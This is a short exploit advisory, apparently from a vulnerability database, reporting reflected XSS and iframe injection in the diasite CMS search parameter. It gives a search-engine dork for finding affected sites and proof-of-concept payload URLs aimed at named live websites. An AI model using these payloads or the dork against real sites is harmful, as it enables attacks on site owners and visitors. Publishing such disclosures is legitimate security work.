diasite CMS Reflected XSS & Iframe injection

2016.10.08
fr Implosion (FR) fr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------------------- [Description] #Exploit title: diasite CMS Reflected XSS & Iframe injection #Exploit author: Implosion #Date: 07/10/2016 #Dorks: intext: "Powered by diasite" #Website: www.diasite.fr #Tested on: Firefox ---------------------------------------------------------------------- [Vulnerability][Reflected XSS] http://www.diateam.net/Rechercher-14-0-0-0.html?q="><script>alert('XSS')</script> ---------------------------------------------------------------------- [Vulnerability][Iframe Injection] http://www.diateam.net/Rechercher-14-0-0-0.html?q="><iframe src=https://cxsecurity.com> ---------------------------------------------------------------------- [Example] http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%22%3E%3Ciframe%20src=https://cxsecurity.com%3E ---------------------------------------------------------------------- #Discovered By Implosion #Thanks to: ÐØΨΠ–ŠËRVËR ----------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top